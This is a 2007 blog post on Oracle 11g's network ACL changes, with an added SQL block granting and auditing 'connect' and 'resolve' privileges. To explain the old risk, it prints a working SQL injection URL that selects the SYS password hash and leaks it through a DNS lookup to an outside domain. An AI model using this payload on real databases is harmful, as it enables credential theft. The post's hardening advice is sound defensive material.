11/02/2007: "Another set of 11g Security Improvements"
Previous versions of Oracle came with a ready-made set of networking PL/SQL packages, namely UTL_TCP, UTL_HTTP, UTL_SMTP, UTL_MAIL and UTL_INADDR. PUBLIC had EXECUTE permission on these packages, and this posed a security risk. For example, in a SQL injection attack via a web server, an attacker could exfiltrate data out of the network over UDP port 53 masquerading as DNS queries. This is accomplished by injecting UTL_INADDR.GET_HOST_ADDRESS into the vector:
http://www.example.com/foo.jsp?p_vector=bar'||UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM SYS.DBA_USERS WHERE USERNAME = 'SYS')||'.ngssoftware.com')--
Here, the password hash for the SYS user ("D3AAEDA7EDA1B4AB") is selected from DBA_USERS, prefixed to ".ngssoftware.com" and then passed as the hostname to look up using UTL_INADDR. This causes the database server to issue a DNS query for D3AAEDA7EDA1B4AB.ngssoftware.com. Now, as long as the attacker controls the ngssoftware.com domain name server, he eventually receives the DNS query and thus the data he's interested in. Another attack involves exfiltrating data using UTL_HTTP.REQUEST over the web.
Anyway, long story short, before people can use these network utilities now they need special permissions that are granted via a new package called DBMS_NETWORK_ACL_ADMIN using the CREATE_ACL procedure. To use UTL_TCP, UTL_HTTP, UTL_MAIL and UTL_SMTP they need to be granted the "connect" privilege, and to use UTL_INADDR they need the "resolve" privilege.
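As an added example (not from the original post), this is how an 11g DBA would grant one application account, rather than PUBLIC, the two privileges just described and scope them to a single host and port; the ACL file name, the principal APP_USER and the host name are assumed values.

```sql
-- Create an ACL granting APP_USER (assumed account) the "connect" privilege,
-- which is what UTL_TCP, UTL_HTTP, UTL_SMTP and UTL_MAIL check.
BEGIN
  DBMS_NETWORK_ACL_ADMIN.CREATE_ACL(
    acl         => 'app_http_acl.xml',        -- assumed ACL file name in XDB
    description => 'Outbound HTTP for APP_USER only',
    principal   => 'APP_USER',                -- assumed database user
    is_grant    => TRUE,
    privilege   => 'connect');

  -- Add the "resolve" privilege (checked by UTL_INADDR) to the same ACL.
  DBMS_NETWORK_ACL_ADMIN.ADD_PRIVILEGE(
    acl       => 'app_http_acl.xml',
    principal => 'APP_USER',
    is_grant  => TRUE,
    privilege => 'resolve');

  -- Bind the ACL to one host and one port instead of a wildcard such as '*',
  -- so the account cannot reach arbitrary external hosts.
  DBMS_NETWORK_ACL_ADMIN.ASSIGN_ACL(
    acl        => 'app_http_acl.xml',
    host       => 'api.internal.example',     -- assumed host
    lower_port => 80,
    upper_port => 80);

  COMMIT;
END;
/

-- Audit what is in force: which hosts are reachable and by whom.
SELECT host, lower_port, upper_port, acl
  FROM dba_network_acls;

SELECT acl, principal, privilege, is_grant
  FROM dba_network_acl_privileges;

-- Confirm PUBLIC has not been granted "connect" or "resolve" anywhere.
SELECT acl, privilege
  FROM dba_network_acl_privileges
 WHERE principal = 'PUBLIC'
   AND is_grant = 'true';
```

The last query should return no rows; any row it does return re-opens the exfiltration path described above for every database account.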
Unfortunately, I'm at the airport right now and away from my 11g box, so I can't test this, but I'm wondering, if you have the "connect" privilege on, say, UTL_HTTP, whether you also need the "resolve" privilege to be able to look up the remote host. If you don't, then it seems a bit redundant requiring "resolve" on UTL_INADDR, because you can still essentially resolve indirectly via UTL_HTTP.
Anyway, all of this is another good security enhancement to 11g. The more I look the more I'm liking it.